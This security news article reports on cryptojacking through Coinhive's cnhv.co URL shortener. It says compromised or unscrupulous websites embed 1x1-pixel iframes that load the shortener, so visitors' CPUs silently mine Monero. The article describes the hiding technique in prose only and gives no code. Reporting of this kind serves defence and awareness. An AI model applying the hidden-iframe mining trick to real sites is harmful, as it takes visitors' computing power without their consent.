How a URL shortener allows malicious actors to hijack visitors’ CPU power
URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero.
About the cnhv.co URL shortener
“If you have an URL you’d like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solves a number of hashes (adjustable by you) and is automatically forwarded to the target URL afterwards,” Coinhive explains.
When users clicks on the link, they first see an interstitial page showing them a progress bar:
Once the specified number of hashes is solved, they are automatically redirected to the destination URL.
Cnhv.co is meant to be used by site owners to monetize traffic from their website visitors so that they don’t have to show ads or so that the visitors don’t have to pay for the content. Ideally, the site owner should outright tell the visitors what the shortener is doing.
Unfortunately, the shortener has also become another way for scummy site owners and attackers who have compromised websites to mine cryptocurrency while the visitors are none the wiser about what’s happening to their computers.
Cryptomining through hidden URL shorteners
In general, the miner JavaScript is loaded only if the visitors clicks on the shortened URL/link. But malicious users have found a way for the mining to be triggered without user interaction.
Sucuri researchers have flagged hundreds of websites that have been injected with iFrames loading the cnhv.co URL shortener, which allows it to be automatically loaded alongside the rest of the web page (no action on the part of the user is needed) and to initiate the mining.
“The miner script is not being directly loaded from your website but rather through the cnhv[.]co website. It adds what could be viewed as an additional layer of ambiguity and thereby helps it evade detection as some major anti-virus/information security companies do not have it listed as suspicious yet, though many will detect it once the main script coinhive.min.js is loaded,” Sucuri’s Luke Leal explains.
But how does all of this remain hidden to the visitor? Well, the malicious actors have had the brilliant idea to set the size of the iFrame to 1×1 (pixels), so that visitors are unlikely to notice the iFrame on the page (it looks like a speck), and would definitely not see the hashing progress bar.
Some other security researchers have also previously flagged the trick:
#Coinhive found on the website of Union Public Service Commission (India) – https://t.co/ZzPJllNtWz
This is an interesting case of #cryptojacking as it's injecting the short URL form of Coinhive (cnhv[.]co) via the code shown in the screenshot.
cc: @fs0c131y pic.twitter.com/b4GAI1HIEs
— Bad Packets Report (@bad_packets) March 16, 2018
According to Leal, some of the sites using the trick appear to have been compromised, but others seem not to be – its owners are intentionally using the iFrame to stealth cryptomine from their visitors.
“There needs to be an increased focus on adding controls so that this type of blatant abuse can be stopped, or at least greatly reduced. As it stands, it seems to be too easy for this abuse to occur injuring the credibility of legitimate websites who want to ethically use cryptomining as a form of monetization,” he noted.